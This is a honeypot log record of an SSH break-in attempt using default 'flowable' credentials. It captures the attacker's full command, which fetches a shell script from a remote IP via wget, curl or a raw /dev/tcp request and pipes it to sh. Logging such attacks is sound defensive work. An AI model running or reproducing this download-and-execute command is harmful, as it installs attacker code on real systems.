Time | 2024/09/22, 20:26:39 (GMT) |
Transaction ID | JDLWB4HQAQV2N2IA |
Service | ssh |
Location | NL (Netherlands) |
Attacker | 5.182.211.148 |
Classification | Web script execution |
Harm Potential | High |
5.182.211.148 client username 'flowable' and password 'flowable' entered
5.182.211.148 client command : 'uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; SC=$(wget -O- http://94.156.177.109/sh || curl http://94.156.177.109/sh); if [ $? -ne 0 ]; then exec 3<>"/dev/tcp/94.156.177.109/80"; echo -e "GET /sh HTTP/1.0\r\nHost: 94.156.177.109\r\n\r\n" >&3; (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 | sh -s ssh; exec 3>&-; else echo "$SC" | sh -s ssh; fi'
All observations come from the honeypot central database.